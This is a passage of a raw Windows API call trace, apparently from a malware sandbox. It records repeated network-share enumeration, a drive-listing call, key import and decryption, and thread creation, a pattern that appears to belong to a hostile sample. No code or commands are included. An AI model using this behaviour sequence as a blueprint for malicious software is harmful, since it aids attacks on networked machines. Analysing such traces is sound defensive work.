lpBufferSize=0x348f034) returned 0x103 [0192.636] WNetCloseEnum (hEnum=0x28df90) returned 0x0 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3500098 | out: hHeap=0x1db0000) returned 1 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35040a0 | out: hHeap=0x1db0000) returned 1 [0192.636] WNetEnumResourceW (in: hEnum=0x28df38, lpcCount=0x348f084, lpBuffer=0x34ec088, lpBufferSize=0x348f074 | out: lpcCount=0x348f084, lpBuffer=0x34ec088, lpBufferSize=0x348f074) returned 0x103 [0192.636] WNetCloseEnum (hEnum=0x28df38) returned 0x0 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x34ec088 | out: hHeap=0x1db0000) returned 1 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x34f0090 | out: hHeap=0x1db0000) returned 1 [0192.636] WNetEnumResourceW (in: hEnum=0x28dee0, lpcCount=0x348f0c4, lpBuffer=0x34d8078, lpBufferSize=0x348f0b4 | out: lpcCount=0x348f0c4, lpBuffer=0x34d8078, lpBufferSize=0x348f0b4) returned 0x103 [0192.636] WNetCloseEnum (hEnum=0x28dee0) returned 0x0 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x34d8078 | out: hHeap=0x1db0000) returned 1 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x34dc080 | out: hHeap=0x1db0000) returned 1 [0192.636] WNetEnumResourceW (in: hEnum=0x28de88, lpcCount=0x348f104, lpBuffer=0x34c4068, lpBufferSize=0x348f0f4 | out: lpcCount=0x348f104, lpBuffer=0x34c4068, lpBufferSize=0x348f0f4) returned 0x103 [0192.636] WNetCloseEnum (hEnum=0x28de88) returned 0x0 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x34c4068 | out: hHeap=0x1db0000) returned 1 [0192.638] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x34c8070 | out: hHeap=0x1db0000) returned 1 [0192.641] WNetEnumResourceW (in: hEnum=0x28de30, lpcCount=0x348f144, lpBuffer=0x34b0058, lpBufferSize=0x348f134 | out: lpcCount=0x348f144, lpBuffer=0x34b0058, lpBufferSize=0x348f134) returned 0x103 [0192.641] WNetCloseEnum (hEnum=0x28de30) returned 0x0 [0192.641] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x34b0058 | out: hHeap=0x1db0000) returned 1 [0192.641] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x34b4060 | out: hHeap=0x1db0000) returned 1 [0192.641] WNetEnumResourceW (in: hEnum=0x28ddd8, lpcCount=0x348f184, lpBuffer=0x4188120, lpBufferSize=0x348f174 | out: lpcCount=0x348f184, lpBuffer=0x4188120, lpBufferSize=0x348f174) returned 0x103 [0192.641] WNetCloseEnum (hEnum=0x28ddd8) returned 0x0 [0192.641] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4188120 | out: hHeap=0x1db0000) returned 1 [0192.641] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x34a0050 | out: hHeap=0x1db0000) returned 1 [0192.641] WNetEnumResourceW (in: hEnum=0x28dd80, lpcCount=0x348f1c4, lpBuffer=0x4184118, lpBufferSize=0x348f1b4 | out: lpcCount=0x348f1c4, lpBuffer=0x4184118, lpBufferSize=0x348f1b4) returned 0x103 [0192.641] WNetCloseEnum (hEnum=0x28dd80) returned 0x0 [0192.641] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4184118 | out: hHeap=0x1db0000) returned 1 [0192.641] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3490048 | out: hHeap=0x1db0000) returned 1 [0192.641] WNetEnumResourceW (in: hEnum=0x28dd28, lpcCount=0x348f204, lpBuffer=0x4170108, lpBufferSize=0x348f1f4 | out: lpcCount=0x348f204, lpBuffer=0x4170108, lpBufferSize=0x348f1f4) returned 0x103 [0192.641] WNetCloseEnum (hEnum=0x28dd28) returned 0x0 [0192.641] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4170108 | out: hHeap=0x1db0000) returned 1 [0192.641] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4174110 | out: hHeap=0x1db0000) returned 1 [0192.642] WNetEnumResourceW (in: hEnum=0x28dcd0, lpcCount=0x348f244, lpBuffer=0x415c0f8, lpBufferSize=0x348f234 | out: lpcCount=0x348f244, lpBuffer=0x415c0f8, lpBufferSize=0x348f234) returned 0x103 [0192.642] WNetCloseEnum (hEnum=0x28dcd0) returned 0x0 [0192.642] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x415c0f8 | out: hHeap=0x1db0000) returned 1 [0192.642] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4160100 | out: hHeap=0x1db0000) returned 1 [0192.642] WNetEnumResourceW (in: hEnum=0x28dc78, lpcCount=0x348f284, lpBuffer=0x41480e8, lpBufferSize=0x348f274 | out: lpcCount=0x348f284, lpBuffer=0x41480e8, lpBufferSize=0x348f274) returned 0x103 [0192.642] WNetCloseEnum (hEnum=0x28dc78) returned 0x0 [0192.642] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41480e8 | out: hHeap=0x1db0000) returned 1 [0192.643] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x414c0f0 | out: hHeap=0x1db0000) returned 1 [0192.644] WNetEnumResourceW (in: hEnum=0x28dc20, lpcCount=0x348f2c4, lpBuffer=0x41340d8, lpBufferSize=0x348f2b4 | out: lpcCount=0x348f2c4, lpBuffer=0x41340d8, lpBufferSize=0x348f2b4) returned 0x103 [0192.644] WNetCloseEnum (hEnum=0x28dc20) returned 0x0 [0192.644] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41340d8 | out: hHeap=0x1db0000) returned 1 [0192.644] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41380e0 | out: hHeap=0x1db0000) returned 1 [0192.644] WNetEnumResourceW (in: hEnum=0x28dbc8, lpcCount=0x348f304, lpBuffer=0x41200c8, lpBufferSize=0x348f2f4 | out: lpcCount=0x348f304, lpBuffer=0x41200c8, lpBufferSize=0x348f2f4) returned 0x103 [0192.644] WNetCloseEnum (hEnum=0x28dbc8) returned 0x0 [0192.644] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41200c8 | out: hHeap=0x1db0000) returned 1 [0192.644] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41240d0 | out: hHeap=0x1db0000) returned 1 [0192.644] WNetEnumResourceW (in: hEnum=0x28db70, lpcCount=0x348f344, lpBuffer=0x410c0b8, lpBufferSize=0x348f334 | out: lpcCount=0x348f344, lpBuffer=0x410c0b8, lpBufferSize=0x348f334) returned 0x103 [0192.644] WNetCloseEnum (hEnum=0x28db70) returned 0x0 [0192.644] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x410c0b8 | out: hHeap=0x1db0000) returned 1 [0192.645] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41100c0 | out: hHeap=0x1db0000) returned 1 [0192.647] WNetEnumResourceW (in: hEnum=0x28db18, lpcCount=0x348f384, lpBuffer=0x40f80a8, lpBufferSize=0x348f374 | out: lpcCount=0x348f384, lpBuffer=0x40f80a8, lpBufferSize=0x348f374) returned 0x103 [0192.647] WNetCloseEnum (hEnum=0x28db18) returned 0x0 [0192.647] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40f80a8 | out: hHeap=0x1db0000) returned 1 [0192.647] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40fc0b0 | out: hHeap=0x1db0000) returned 1 [0192.648] WNetEnumResourceW (in: hEnum=0x28dac0, lpcCount=0x348f3c4, lpBuffer=0x40e4098, lpBufferSize=0x348f3b4 | out: lpcCount=0x348f3c4, lpBuffer=0x40e4098, lpBufferSize=0x348f3b4) returned 0x103 [0192.648] WNetCloseEnum (hEnum=0x28dac0) returned 0x0 [0192.648] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40e4098 | out: hHeap=0x1db0000) returned 1 [0192.648] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40e80a0 | out: hHeap=0x1db0000) returned 1 [0192.648] WNetEnumResourceW (in: hEnum=0x28da68, lpcCount=0x348f404, lpBuffer=0x40d0088, lpBufferSize=0x348f3f4 | out: lpcCount=0x348f404, lpBuffer=0x40d0088, lpBufferSize=0x348f3f4) returned 0x103 [0192.648] WNetCloseEnum (hEnum=0x28da68) returned 0x0 [0192.648] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40d0088 | out: hHeap=0x1db0000) returned 1 [0192.648] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40d4090 | out: hHeap=0x1db0000) returned 1 [0192.648] WNetEnumResourceW (in: hEnum=0x28da10, lpcCount=0x348f444, lpBuffer=0x40bc078, lpBufferSize=0x348f434 | out: lpcCount=0x348f444, lpBuffer=0x40bc078, lpBufferSize=0x348f434) returned 0x103 [0192.648] WNetCloseEnum (hEnum=0x28da10) returned 0x0 [0192.648] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40bc078 | out: hHeap=0x1db0000) returned 1 [0192.648] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40c0080 | out: hHeap=0x1db0000) returned 1 [0192.648] WNetEnumResourceW (in: hEnum=0x28d8c0, lpcCount=0x348f484, lpBuffer=0x40a8068, lpBufferSize=0x348f474 | out: lpcCount=0x348f484, lpBuffer=0x40a8068, lpBufferSize=0x348f474) returned 0x103 [0192.648] WNetCloseEnum (hEnum=0x28d8c0) returned 0x0 [0192.648] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40a8068 | out: hHeap=0x1db0000) returned 1 [0192.649] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40ac070 | out: hHeap=0x1db0000) returned 1 [0192.650] WNetEnumResourceW (in: hEnum=0x28d868, lpcCount=0x348f4c4, lpBuffer=0x4094058, lpBufferSize=0x348f4b4 | out: lpcCount=0x348f4c4, lpBuffer=0x4094058, lpBufferSize=0x348f4b4) returned 0x103 [0192.650] WNetCloseEnum (hEnum=0x28d868) returned 0x0 [0192.650] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4094058 | out: hHeap=0x1db0000) returned 1 [0192.651] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4098060 | out: hHeap=0x1db0000) returned 1 [0192.652] WNetEnumResourceW (in: hEnum=0x28d810, lpcCount=0x348f504, lpBuffer=0x4080048, lpBufferSize=0x348f4f4 | out: lpcCount=0x348f504, lpBuffer=0x4080048, lpBufferSize=0x348f4f4) returned 0x103 [0192.652] WNetCloseEnum (hEnum=0x28d810) returned 0x0 [0192.652] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4080048 | out: hHeap=0x1db0000) returned 1 [0192.685] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4084050 | out: hHeap=0x1db0000) returned 1 [0192.687] WNetEnumResourceW (in: hEnum=0x28d7b8, lpcCount=0x348f544, lpBuffer=0x40280b8, lpBufferSize=0x348f534 | out: lpcCount=0x348f544, lpBuffer=0x40280b8, lpBufferSize=0x348f534) returned 0x103 [0192.687] WNetCloseEnum (hEnum=0x28d7b8) returned 0x0 [0192.687] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40280b8 | out: hHeap=0x1db0000) returned 1 [0192.687] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4070040 | out: hHeap=0x1db0000) returned 1 [0192.687] WNetEnumResourceW (in: hEnum=0x28d760, lpcCount=0x348f584, lpBuffer=0x40240b0, lpBufferSize=0x348f574 | out: lpcCount=0x348f584, lpBuffer=0x40240b0, lpBufferSize=0x348f574) returned 0x103 [0192.687] WNetCloseEnum (hEnum=0x28d760) returned 0x0 [0192.688] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40240b0 | out: hHeap=0x1db0000) returned 1 [0192.688] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4060038 | out: hHeap=0x1db0000) returned 1 [0192.688] WNetEnumResourceW (in: hEnum=0x28d708, lpcCount=0x348f5c4, lpBuffer=0x40200a8, lpBufferSize=0x348f5b4 | out: lpcCount=0x348f5c4, lpBuffer=0x40200a8, lpBufferSize=0x348f5b4) returned 0x103 [0192.688] WNetCloseEnum (hEnum=0x28d708) returned 0x0 [0192.688] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40200a8 | out: hHeap=0x1db0000) returned 1 [0192.688] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4050030 | out: hHeap=0x1db0000) returned 1 [0192.688] WNetEnumResourceW (in: hEnum=0x28d6b0, lpcCount=0x348f604, lpBuffer=0x401c0a0, lpBufferSize=0x348f5f4 | out: lpcCount=0x348f604, lpBuffer=0x401c0a0, lpBufferSize=0x348f5f4) returned 0x103 [0192.688] WNetCloseEnum (hEnum=0x28d6b0) returned 0x0 [0192.688] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x401c0a0 | out: hHeap=0x1db0000) returned 1 [0192.688] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4040028 | out: hHeap=0x1db0000) returned 1 [0192.688] WNetEnumResourceW (in: hEnum=0x28d658, lpcCount=0x348f644, lpBuffer=0x4008090, lpBufferSize=0x348f634 | out: lpcCount=0x348f644, lpBuffer=0x4008090, lpBufferSize=0x348f634) returned 0x103 [0192.688] WNetCloseEnum (hEnum=0x28d658) returned 0x0 [0192.688] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4008090 | out: hHeap=0x1db0000) returned 1 [0192.689] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x400c098 | out: hHeap=0x1db0000) returned 1 [0192.690] WNetEnumResourceW (in: hEnum=0x28d600, lpcCount=0x348f684, lpBuffer=0x3ff4080, lpBufferSize=0x348f674 | out: lpcCount=0x348f684, lpBuffer=0x3ff4080, lpBufferSize=0x348f674) returned 0x103 [0192.690] WNetCloseEnum (hEnum=0x28d600) returned 0x0 [0192.690] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3ff4080 | out: hHeap=0x1db0000) returned 1 [0192.690] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3ff8088 | out: hHeap=0x1db0000) returned 1 [0192.690] WNetEnumResourceW (in: hEnum=0x28d5a8, lpcCount=0x348f6c4, lpBuffer=0x3fe0070, lpBufferSize=0x348f6b4 | out: lpcCount=0x348f6c4, lpBuffer=0x3fe0070, lpBufferSize=0x348f6b4) returned 0x103 [0192.690] WNetCloseEnum (hEnum=0x28d5a8) returned 0x0 [0192.690] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fe0070 | out: hHeap=0x1db0000) returned 1 [0192.691] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fe4078 | out: hHeap=0x1db0000) returned 1 [0192.692] WNetEnumResourceW (in: hEnum=0x28d550, lpcCount=0x348f704, lpBuffer=0x310bf78, lpBufferSize=0x348f6f4 | out: lpcCount=0x348f704, lpBuffer=0x310bf78, lpBufferSize=0x348f6f4) returned 0x103 [0192.692] WNetCloseEnum (hEnum=0x28d550) returned 0x0 [0192.692] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x310bf78 | out: hHeap=0x1db0000) returned 1 [0192.693] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fd0068 | out: hHeap=0x1db0000) returned 1 [0192.693] WNetEnumResourceW (in: hEnum=0x28d4f8, lpcCount=0x348f744, lpBuffer=0x3107f70, lpBufferSize=0x348f734 | out: lpcCount=0x348f744, lpBuffer=0x3107f70, lpBufferSize=0x348f734) returned 0x103 [0192.693] WNetCloseEnum (hEnum=0x28d4f8) returned 0x0 [0192.693] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3107f70 | out: hHeap=0x1db0000) returned 1 [0192.695] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fc0060 | out: hHeap=0x1db0000) returned 1 [0192.696] WNetEnumResourceW (in: hEnum=0x28d4a0, lpcCount=0x348f784, lpBuffer=0x3093f18, lpBufferSize=0x348f774 | out: lpcCount=0x348f784, lpBuffer=0x3093f18, lpBufferSize=0x348f774) returned 0x103 [0192.696] WNetCloseEnum (hEnum=0x28d4a0) returned 0x0 [0192.696] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3093f18 | out: hHeap=0x1db0000) returned 1 [0192.697] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fb0058 | out: hHeap=0x1db0000) returned 1 [0192.700] WNetEnumResourceW (in: hEnum=0x28d448, lpcCount=0x348f7c4, lpBuffer=0x307ff08, lpBufferSize=0x348f7b4 | out: lpcCount=0x348f7c4, lpBuffer=0x307ff08, lpBufferSize=0x348f7b4) returned 0x103 [0192.700] WNetCloseEnum (hEnum=0x28d448) returned 0x0 [0192.700] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x307ff08 | out: hHeap=0x1db0000) returned 1 [0192.700] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3083f10 | out: hHeap=0x1db0000) returned 1 [0192.700] WNetEnumResourceW (in: hEnum=0x28d3f0, lpcCount=0x348f804, lpBuffer=0x306bef8, lpBufferSize=0x348f7f4 | out: lpcCount=0x348f804, lpBuffer=0x306bef8, lpBufferSize=0x348f7f4) returned 0x103 [0192.700] WNetCloseEnum (hEnum=0x28d3f0) returned 0x0 [0192.700] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0192.700] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306ff00 | out: hHeap=0x1db0000) returned 1 [0192.701] WNetEnumResourceW (in: hEnum=0x28d398, lpcCount=0x348f844, lpBuffer=0x3057ee8, lpBufferSize=0x348f834 | out: lpcCount=0x348f844, lpBuffer=0x3057ee8, lpBufferSize=0x348f834) returned 0x103 [0192.701] WNetCloseEnum (hEnum=0x28d398) returned 0x0 [0192.701] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3057ee8 | out: hHeap=0x1db0000) returned 1 [0192.701] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) returned 1 [0192.702] WNetEnumResourceW (in: hEnum=0x28d340, lpcCount=0x348f884, lpBuffer=0x3103f68, lpBufferSize=0x348f874 | out: lpcCount=0x348f884, lpBuffer=0x3103f68, lpBufferSize=0x348f874) returned 0x103 [0192.702] WNetCloseEnum (hEnum=0x28d340) returned 0x0 [0192.702] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3103f68 | out: hHeap=0x1db0000) returned 1 [0192.703] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3047ee0 | out: hHeap=0x1db0000) returned 1 [0192.704] WNetEnumResourceW (in: hEnum=0x28d2e8, lpcCount=0x348f8c4, lpBuffer=0x30fff60, lpBufferSize=0x348f8b4 | out: lpcCount=0x348f8c4, lpBuffer=0x30fff60, lpBufferSize=0x348f8b4) returned 0x103 [0192.704] WNetCloseEnum (hEnum=0x28d2e8) returned 0x0 [0192.704] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30fff60 | out: hHeap=0x1db0000) returned 1 [0192.705] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3037ed8 | out: hHeap=0x1db0000) returned 1 [0192.706] WNetEnumResourceW (in: hEnum=0x28d290, lpcCount=0x348f904, lpBuffer=0x30fbf58, lpBufferSize=0x348f8f4 | out: lpcCount=0x348f904, lpBuffer=0x30fbf58, lpBufferSize=0x348f8f4) returned 0x103 [0192.706] WNetCloseEnum (hEnum=0x28d290) returned 0x0 [0192.706] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30fbf58 | out: hHeap=0x1db0000) returned 1 [0192.707] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3027ed0 | out: hHeap=0x1db0000) returned 1 [0192.708] WNetEnumResourceW (in: hEnum=0x28d238, lpcCount=0x348f944, lpBuffer=0x30e7f48, lpBufferSize=0x348f934 | out: lpcCount=0x348f944, lpBuffer=0x30e7f48, lpBufferSize=0x348f934) returned 0x103 [0192.708] WNetCloseEnum (hEnum=0x28d238) returned 0x0 [0192.708] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30e7f48 | out: hHeap=0x1db0000) returned 1 [0192.710] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf50 | out: hHeap=0x1db0000) returned 1 [0192.710] WNetEnumResourceW (in: hEnum=0x28d1e0, lpcCount=0x348f984, lpBuffer=0x30d3f38, lpBufferSize=0x348f974 | out: lpcCount=0x348f984, lpBuffer=0x30d3f38, lpBufferSize=0x348f974) returned 0x103 [0192.710] WNetCloseEnum (hEnum=0x28d1e0) returned 0x0 [0192.710] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30d3f38 | out: hHeap=0x1db0000) returned 1 [0192.711] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30d7f40 | out: hHeap=0x1db0000) returned 1 [0192.711] WNetEnumResourceW (in: hEnum=0x28d130, lpcCount=0x348f9c4, lpBuffer=0x30bff28, lpBufferSize=0x348f9b4 | out: lpcCount=0x348f9c4, lpBuffer=0x30bff28, lpBufferSize=0x348f9b4) returned 0x103 [0192.711] WNetCloseEnum (hEnum=0x28d130) returned 0x0 [0192.711] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bff28 | out: hHeap=0x1db0000) returned 1 [0192.712] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30c3f30 | out: hHeap=0x1db0000) returned 1 [0192.713] WNetEnumResourceW (in: hEnum=0x2a1850, lpcCount=0x348fa04, lpBuffer=0x403c020, lpBufferSize=0x348f9f4 | out: lpcCount=0x348fa04, lpBuffer=0x403c020, lpBufferSize=0x348f9f4) returned 0x103 [0192.713] WNetCloseEnum (hEnum=0x2a1850) returned 0x0 [0192.713] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x403c020 | out: hHeap=0x1db0000) returned 1 [0192.713] WNetEnumResourceW (in: hEnum=0x261148, lpcCount=0x348fa44, lpBuffer=0x4038018, lpBufferSize=0x348fa34 | out: lpcCount=0x348fa44, lpBuffer=0x4038018, lpBufferSize=0x348fa34) returned 0x103 [0192.714] WNetCloseEnum (hEnum=0x261148) returned 0x0 [0192.714] WNetEnumResourceW (in: hEnum=0x2b8900, lpcCount=0x348fa84, lpBuffer=0x4034010, lpBufferSize=0x348fa74 | out: lpcCount=0x348fa84, lpBuffer=0x4034010, lpBufferSize=0x348fa74) returned 0x103 [0192.714] WNetCloseEnum (hEnum=0x2b8900) returned 0x0 [0192.714] WNetEnumResourceW (in: hEnum=0x28eaf8, lpcCount=0x348fac4, lpBuffer=0x4030008, lpBufferSize=0x348fab4 | out: lpcCount=0x348fac4, lpBuffer=0x4030008, lpBufferSize=0x348fab4) returned 0x103 [0192.714] WNetCloseEnum (hEnum=0x28eaf8) returned 0x0 [0192.714] WNetEnumResourceW (in: hEnum=0x2922e8, lpcCount=0x348fb04, lpBuffer=0x309bf10, lpBufferSize=0x348faf4 | out: lpcCount=0x348fb04, lpBuffer=0x309bf10, lpBufferSize=0x348faf4) returned 0x103 [0192.714] WNetCloseEnum (hEnum=0x2922e8) returned 0x0 [0192.720] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x348fb2c | out: lphEnum=0x348fb2c*=0x283a00) returned 0x0 [0192.720] WNetEnumResourceW (in: hEnum=0x283a00, lpcCount=0x348fb34, lpBuffer=0x3017ec8, lpBufferSize=0x348fb24 | out: lpcCount=0x348fb34, lpBuffer=0x3017ec8, lpBufferSize=0x348fb24) returned 0x103 [0192.720] WNetCloseEnum (hEnum=0x283a00) returned 0x0 [0192.720] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x348fb14 | out: lphEnum=0x348fb14*=0x29c020) returned 0x0 [0192.720] WNetEnumResourceW (in: hEnum=0x29c020, lpcCount=0x348fb1c, lpBuffer=0x3017ec8, lpBufferSize=0x348fb0c | out: lpcCount=0x348fb1c, lpBuffer=0x3017ec8, lpBufferSize=0x348fb0c) returned 0x0 [0192.720] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x301bed0 [0192.720] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3fa0050 [0192.720] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x3017f08, lphEnum=0x348fad4 | out: lphEnum=0x348fad4*=0x0) returned 0x4c6 [0192.721] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x3017ee8, lphEnum=0x348fad4 | out: lphEnum=0x348fad4*=0x283a00) returned 0x0 [0192.726] WNetEnumResourceW (in: hEnum=0x283a00, lpcCount=0x348fadc, lpBuffer=0x301bed0, lpBufferSize=0x348facc | out: lpcCount=0x348fadc, lpBuffer=0x301bed0, lpBufferSize=0x348facc) returned 0x0 [0192.726] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x301fed8 [0192.726] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3490048 [0192.726] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x301bed0, lphEnum=0x348fa94 | out: lphEnum=0x348fa94*=0x2839c0) returned 0x0 [0192.728] WNetEnumResourceW (in: hEnum=0x2839c0, lpcCount=0x348fa9c, lpBuffer=0x301fed8, lpBufferSize=0x348fa8c | out: lpcCount=0x348fa9c, lpBuffer=0x301fed8, lpBufferSize=0x348fa8c) returned 0x103 [0192.728] WNetCloseEnum (hEnum=0x2839c0) returned 0x0 [0192.730] WNetEnumResourceW (in: hEnum=0x283a00, lpcCount=0x348fadc, lpBuffer=0x301bed0, lpBufferSize=0x348facc | out: lpcCount=0x348fadc, lpBuffer=0x301bed0, lpBufferSize=0x348facc) returned 0x103 [0192.730] WNetCloseEnum (hEnum=0x283a00) returned 0x0 [0192.730] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x3017ec8, lphEnum=0x348fad4 | out: lphEnum=0x348fad4*=0x283a00) returned 0x0 [0192.732] WNetEnumResourceW (in: hEnum=0x283a00, lpcCount=0x348fadc, lpBuffer=0x301bed0, lpBufferSize=0x348facc | out: lpcCount=0x348fadc, lpBuffer=0x301bed0, lpBufferSize=0x348facc) returned 0x103 [0192.732] WNetCloseEnum (hEnum=0x283a00) returned 0x0 [0192.732] WNetEnumResourceW (in: hEnum=0x29c020, lpcCount=0x348fb1c, lpBuffer=0x3017ec8, lpBufferSize=0x348fb0c | out: lpcCount=0x348fb1c, lpBuffer=0x3017ec8, lpBufferSize=0x348fb0c) returned 0x103 [0192.732] WNetCloseEnum (hEnum=0x29c020) returned 0x0 Thread: id = 99 os_tid = 0x724 [0111.113] GetLogicalDrives () returned 0x4 [0111.113] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0111.113] CryptImportKey (in: hProv=0x254d70, pbData=0x36ffc10, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x36ffc78 | out: phKey=0x36ffc78*=0x29bfe0) returned 1 [0111.113] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x36ffc60, dwFlags=0x0) returned 1 [0111.113] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x36ffc2c | out: pbData=0x1db54e8, pdwDataLen=0x36ffc2c) returned 1 [0111.113] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0111.113] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x28) returned 0x1db5530 [0111.113] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x24c [0111.113] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x250 [0111.113] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016e70 [0111.114] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0xe) returned 0x3016e58 [0111.114] ResetEvent (hEvent=0x250) returned 1 [0111.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x833b2e, lpParameter=0x3016e70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x254 